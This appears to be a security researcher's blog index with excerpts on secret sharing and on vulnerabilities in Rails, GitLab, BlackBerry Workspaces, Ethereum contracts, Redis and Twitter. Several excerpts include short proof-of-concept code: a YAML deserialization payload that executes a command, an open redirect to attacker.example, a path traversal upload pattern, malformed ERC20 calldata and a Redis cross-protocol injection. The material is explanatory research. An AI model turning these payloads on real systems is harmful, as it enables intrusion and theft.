06 Oct 2018

Shamir's Secret Sharing Scheme

Consider a scenario in which you are tasked with managing the security of a bank’s vault. The vault is considered impenetrable without a key, which you are given on your first day on the job. Your goal is to securely manage the key.

Let us suppose that you decide to keep the key on you at all times, granting access to the vault on an as-needed basis. You quickly learn that such a solution doesn’t scale well in practice, as your physical presence is required whenever the vault needs to be opened. What about those vacation days you were promised? Also, perhaps more frighteningly, what if you lost the one and only key?

With your vacation days in mind, you decide to make a copy of the key and entrust it with another employee. However, you realize that this isn’t ideal either. In doubling the number of keys, you have also doubled the number of opportunities for a thief to steal the vault’s key.

Out of desperation, you destroy the duplicate and decide to split the original key in half. Now, you think, two trusted people must each be physically present with their key shard to reassemble the key and unlock the vault. A thief would need to steal both key shards to reassemble the original key, which is double the work of stealing a single key. However, you soon realize that this scheme isn’t much better than simply having one key, because if either of you were to lose your key half, the full key could no longer be recovered.

This problem could be solved with a series of additional keys and locks, but that approach quickly requires an unwieldy number of them. You decide that an ideal key management scheme must involve splitting up a key, so that its security isn’t fully entrusted to one person. You also conclude that only some threshold of key shards should be required for reassembly, so that one person losing their shard (or going on vacation) doesn’t render the entire key unrecoverable.
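Shamir’s construction gives exactly these properties: the secret becomes the constant term of a random degree k−1 polynomial over a finite field, each shard is a point on that polynomial, and any k points recover the secret by interpolation while fewer reveal nothing. Below is a minimal Ruby sketch of the idea; the toy prime, the use of rand instead of a secure RNG, and the integer-encoded secret are simplifying assumptions for illustration, not production choices.

P = 2**127 - 1   # a Mersenne prime comfortably larger than the demo secret

# Split `secret` into n shards, any k of which suffice to recover it.
def split(secret, k, n)
  coeffs = [secret] + Array.new(k - 1) { rand(P) }   # random degree k-1 polynomial
  (1..n).map do |x|
    [x, coeffs.each_with_index.sum { |c, i| c * x.pow(i, P) } % P]
  end
end

# Recover the secret (the polynomial evaluated at x = 0) from any k shards
# via Lagrange interpolation over the prime field.
def recover(shards)
  shards.sum do |xi, yi|
    num = den = 1
    shards.each do |xj, _|
      next if xj == xi
      num = num * -xj % P
      den = den * (xi - xj) % P
    end
    yi * num % P * den.pow(P - 2, P)   # den^(P-2) is the modular inverse (Fermat)
  end % P
end

shards = split(1234567890, 3, 5)   # five shards, any three reassemble the key
recover(shards.sample(3))          # => 1234567890

Any three of the five shards reproduce the secret; two or fewer reveal nothing about it.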

21 Dec 2017

From YAML Deserialization to RCE in Ruby on Rails Applications

It’s not uncommon for me to find unsafe YAML deserialization while reviewing Ruby on Rails applications. For those who aren’t familiar with the dangers of arbitrary YAML deserialization, the short of it is that deserializing YAML can lead to code execution. This is possible because YAML deserialization allocates a new Ruby object without initializing it, and then calls a callback method named init_with if one is defined. If an object of a particular class were to be cleverly serialized with a particular set of instance variables then maybe, just maybe, a callback made on deserialization would end up executing dangerous code. This is why it is unsafe to pass user input to YAML.load.
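As a concrete (and deliberately contrived) illustration, suppose an application happened to ship a class like the hypothetical AuditLogger below. The class name and its behaviour are invented for this sketch; real-world exploitation chains together gadget classes that already exist in the app or its gems.

require 'yaml'

class AuditLogger
  # Psych calls init_with on the freshly allocated (uninitialized) object,
  # handing it the deserialized mapping. A dangerous implementation like this
  # turns attacker-controlled YAML directly into command execution.
  def init_with(coder)
    system(coder['command'])
  end
end

payload = <<~YAML
  --- !ruby/object:AuditLogger
  command: id
YAML

YAML.unsafe_load(payload)   # runs `id`; plain YAML.load behaved the same way
                            # before Psych 4 made safe loading the default
# YAML.safe_load(payload)   # raises Psych::DisallowedClass instead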

17 Oct 2017

Pervasive Open Redirect in GitLab

While performing a code review of the GitLab open source codebase, I found a pervasive open redirect vulnerability affecting project pages.

The Project Application controller defines a before_action filter named redirect_git_extension. This filter detects and strips the .git extension that may appear at the end of a project request’s URI. To do this, it calls the Ruby on Rails redirect_to method with the original request’s params object.

/app/controllers/projects/application_controller.rb:4-5
skip_before_action :authenticate_user!
before_action :redirect_git_extension

The redirect_git_extension filter is defined as follows.

/app/controllers/projects/application_controller.rb:14-21
  def redirect_git_extension
    # Redirect from
    #   localhost/group/project.git
    # to
    #   localhost/group/project
    #
    redirect_to url_for(params.merge(format: nil)) if params[:format] == 'git'
  end

Because the requester controls the params object, redirect_to ends up being called with arbitrary, attacker-influenced options. For a list of the options it accepts in the latest version of Ruby on Rails, please see:

http://api.rubyonrails.org/classes/ActionController/Redirecting.html
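To sketch the impact (hypothetical hostnames, and assuming a vulnerable version), a single crafted query parameter is enough to turn the .git cleanup into an off-site redirect, since options such as host pass straight from the query string into url_for:

GET https://gitlab.example.com/group/project.git?host=attacker.example

# params[:format] == 'git', so the filter runs
#   redirect_to url_for(params.merge(format: nil))
# and url_for builds its target from the attacker-supplied host option:
#   302 Location: https://attacker.example/group/project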

17 Oct 2017

Remote Code Execution In BlackBerry Workspaces Server

While performing a network penetration test for one of our clients at GDS, I came across a BlackBerry Workspaces (formerly WatchDox) Server. These servers can be deployed on customer networks and function as stand-alone appliances. According to BlackBerry’s product webpage:

BlackBerry® Workspaces provides secure file storage, synchronization and sharing for every use case and budget.

Whether you need to enable personal productivity, facilitate team collaboration, or mobilize and transform your entire business, BlackBerry Workspaces is the best choice for secure file collaboration.

I found that by issuing an HTTP request for a file inside of a particular directory, I could get a specific component of the product to return its source code.

By analyzing this source code, I was able to find a directory traversal vulnerability in unauthenticated file upload functionality. Exploiting this, I was able to then upload a web shell into another component’s webroot and obtain remote code execution. Because these kinds of servers house highly sensitive data, I’m sure you can imagine the sort of access this granted me within the client’s organization.
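The root cause follows the classic upload traversal pattern: a client-supplied file name is joined onto a destination directory without being normalised first. The sketch below illustrates that pattern in Ruby with invented paths; it is not the product’s actual code.

require 'pathname'

UPLOAD_DIR = Pathname.new('/opt/app/uploads')

# Vulnerable: "../" sequences in the client-supplied name escape UPLOAD_DIR,
# e.g. name = "../../other-component/webroot/shell.jsp"
def save_unsafely(name, data)
  File.write(UPLOAD_DIR.join(name), data)
end

# Safer: resolve the final path and refuse anything outside the upload directory.
def save_safely(name, data)
  target = (UPLOAD_DIR + name).cleanpath
  raise ArgumentError, 'traversal attempt' unless target.to_s.start_with?("#{UPLOAD_DIR}/")
  File.write(target, data)
end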

21 Jul 2017

Introducing the Solidity Function Profiler

Static analyzers are good at detecting certain types of security vulnerabilities. However, one place that static analysis often falls short is in the detection of authorization bugs. This is because authorization tends to be a “business logic” problem. How would an analyzer know what functionality should be off-limits to normal users? One can infer based on semantics (looking for words like “admin”), but such clear-cut cases can be rare.

A couple of days ago I wrote about Parity’s multi-sig contract vulnerability. Because there was nothing inherently wrong with the vulnerable functions, aside from the lack of authorization checks, it is unlikely that a static analyzer would have flagged these issues.

If I had to take a guess at the culprit behind this vulnerability getting missed, it would probably be a lack of effective manual code review. Manual code review is a tedious, time-consuming task, but it is often the only way to find certain types of bugs. In this particular case, a human looking at a list of the contract’s functions would have hopefully noticed several suspicious looking public functions.

As far as I know, there are no public tools for Solidity to profile a contract’s functions. That is why today I would like to release a tool called the Solidity Function Profiler.

20 Jul 2017

Parity Multi-Sig Contract Vulnerability

So this just happened. It’s late, but before heading to bed I wanted to quickly write up a technical analysis of this one because it’s quite short.

25 Jun 2017

Analyzing the ERC20 Short Address Attack

Back in April of 2017, the Golem Project published a blog post about the discovery of a security bug affecting some exchanges such as Poloniex. According to the post, when certain exchanges processed transactions of ERC20 tokens, input validation was not being performed on account address length. The result was malformed input data being provided to the contract’s transfer function, and a subsequent underflow condition that manipulated the amount being sent. The impact was that an attacker could potentially rob an exchange account of tokens.

The attack explained by the Golem Project exemplifies a rather unique case in which an exchange acts as both a client and a server. That is, the exchange is a server for users to buy tokens as well as a client to the Ethereum network. This differs from typical contract interaction in which a client uses the Ethereum network directly, and any transaction error would likely be the sole fault of the client and not a third-party. Luckily for the Golem Project, the vulnerability is not known to have ever been exploited. It has since been dubbed the “ERC20 short address attack.”

This got me curious about the feasibility of exploiting this vulnerability today. First and foremost, an attacker would need to manipulate the input data such that A) the provided address resolved to a valid account (ideally one owned by the attacker) and B) the amount specified was less than or equal to that of the exchange’s own supply of ERC20 tokens. How trivial would this be to exploit in the wild today? What can contract developers do to protect themselves?
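To make the mechanics concrete, here is a rough sketch of how the malformed call data comes about, using an invented deposit address and Ruby purely for the hex bookkeeping; it assumes the exchange naively concatenates arguments without checking the address length.

# transfer(address,uint256) is encoded as a 4-byte selector followed by two
# 32-byte arguments. The attacker registers a deposit address whose last byte
# is 0x00, then submits it with that trailing byte omitted (19 bytes).
selector   = 'a9059cbb'
full_addr  = '3bdde1e9fbaef2579dd63e2abbf0be445ab93f00'
short_addr = full_addr[0, 38]          # 19 bytes instead of 20
amount     = 1                         # the exchange intends to send 1 unit

# Naive client-side encoding: fixed padding for the address slot, then the
# (assumed 20-byte) address, then the 32-byte amount.
calldata = selector +
           '0' * 24 +                  # the 12 zero bytes preceding an address
           short_addr +                # one byte too short
           amount.to_s(16).rjust(64, '0')

puts calldata.length / 2 - 4           # 63 bytes of arguments instead of 64

# The EVM zero-pads the missing byte on the right, so ABI decoding shifts:
# the address argument absorbs the amount's leading 0x00 byte and decodes to
# the attacker's real address, while the amount decodes to 1 << 8 = 256 units.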

28 Mar 2017

An Analysis of CVE-2017-5638

I just published some research I did with Gotham Digital Science on the recent Struts vulnerability, CVE-2017-5638. You can find that (rather long) post here, full of in-depth code review and an additional, lesser-known attack vector:

An Analysis of CVE-2017-5638

18 Jul 2016

Client-Side Redis Attack Proof of Concept

I’ve developed a somewhat new proof of concept for a client-side attack on Redis. I say somewhat new because the concept of executing Redis commands via JavaScript is nothing new. However, the original Lua exploit detailed by benmmurphy has been patched, and the question has become “so what’s the threat now?”

Well, I don’t have a Lua sandbox escape 0day. And developer machines don’t typically run SSH exposed to the Internet, so dropping keys into a user’s authorized_keys file, as antirez explains in his post, isn’t all that relevant.

Am I out of luck?
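For reference, the trick that makes any browser-based attack possible is cross-protocol in nature: Redis parses its plain-text protocol line by line, rejects the HTTP request line and headers as unknown commands, and still executes any well-formed commands it finds in the body. Here is a rough sketch of what the server sees when a victim’s browser is coaxed into POSTing to 127.0.0.1:6379, replayed over a raw socket in Ruby; note that Redis 3.2.7 and later abort the connection when they spot POST or Host:, so this reflects the 2016-era behaviour.

require 'socket'

# Roughly what a browser-issued POST to http://127.0.0.1:6379/ looks like
# on the wire. The header lines draw -ERR responses; the body line executes.
payload = [
  'POST / HTTP/1.1',
  'Host: 127.0.0.1:6379',
  'Content-Length: 33',
  '',
  'SET injected_by_browser "hello"',
  ''
].join("\r\n")

sock = TCPSocket.new('127.0.0.1', 6379)
sock.write(payload)
puts sock.readpartial(4096)   # a mix of -ERR lines and a +OK for the SET
sock.close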

05 May 2016

BSides Pre-Con Capture the Flag

This challenge involved a web application that featured a PHP variable inspector.

The instructions read:

NETTITUDE.COM CTF

Enter some serialised PHP in our form below and we’ll output it on the page.

We have some built in classes too.

Objective: Simply run the “getFlag()” method.

03 Dec 2015

Parameter Tampering Attack on Twitter Web Intents

Twitter’s Web Intents allow visitors of a website to interact with content on Twitter without having to leave the website. This is done by means of a twitter.com popup for desktop users, and native app handlers for iOS and Android users. This is the same platform powering the tweet and follow buttons you may see on webpages across the Internet.

I identified a parameter tampering vulnerability affecting Twitter’s Web Intents. It allowed an attacker to stage a Web Intent dialog with tampered parameters, which could lead to a visitor following a Twitter user they didn’t intend to follow.

All four intent types were vulnerable: following a user, liking a tweet, retweeting, and tweeting or replying to a tweet.